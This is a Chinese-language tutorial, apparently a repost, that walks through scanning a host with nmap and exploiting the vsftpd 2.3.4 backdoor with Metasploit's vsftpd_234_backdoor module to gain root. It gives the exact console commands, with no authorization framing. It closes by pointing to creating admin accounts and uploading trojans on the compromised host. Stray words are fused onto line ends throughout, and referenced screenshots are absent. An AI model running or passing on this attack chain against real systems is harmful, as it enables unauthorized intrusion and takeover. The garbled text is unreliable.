vsftpd version 2到2.3.4存在後門漏洞,攻擊者能夠經過該漏洞獲取root權限。這 裏用backtrack 集成的metasploit作測試,metasploit集成了各類各樣的漏洞,咱們能夠在上面利用服務器、我的PC和應用程序的漏洞。開始菜單路徑 backtrack/Exploitation tools/Network Exploitation tools/Metaspolit Framework/msfconsole, 用metaspolit內置的nmap進行主機掃描html
1 |
nmap -sT -A www.91ri.org -sT |
是指用隱蔽的tcp進行鏈接,-A是指在探測中對服務進行詳細的版本測試。nmap是一款強大的掃描工具,簡單的一些用法能夠點擊:《Nmap在實戰中的高級用法》文章查看。服務器
使用nmap結果圖(單擊可放大):app
結果顯示目標主機上運行着ftp服務器,版本爲vsftpd2.3.4,這個版本的vsftpd存在漏洞,攻擊者能夠遠程獲取目標主機的root權限。tcp
下面利用metasploit實施攻擊過程,進入metasploit命令行,search vsftpd,搜索有關vsftpd的相關工具和攻擊載荷。查找結果以下:工具
msf > search vsftpdpost
Matching Modules
================測試
Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Executionui
利用該漏洞命令:命令行
use exploit/unix/ftp/vsftpd_234_backdoor3d
這樣提示符就會提示進入到該路徑下,show options查看須要設置的相關項:
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
– —-
0 Automatic
提示須要設置RHOST(攻擊目標的IP)、RPORT(目標端口),因爲這裏是攻擊ftp軟件,端口默認爲21,咱們設置一下目標的ip,命令: set rhost 192.168.1.101, 在輸入show options回車,確認下參數設置正確。檢查無誤,輸入命令help,查看相關的操縱,通常是run或者exploit便可實施攻擊.
結果如圖(單擊放大)
結果顯示已經獲取了目標主機的root權限,創建管理員帳號、上傳木馬等動做就能夠開始了。剩下的你懂得!
91ri.org:文章很簡單 只是普通的exploit使用教程 不過我轉這篇文章只想告訴你們metasploit不是隻有ms08067!!!!!!! 最近在各個羣裏看過多了 因此再轉篇科普。強烈推薦:《傳說中的metasploit滲透防護終極手冊?》文章,文末暴力評論值得深思!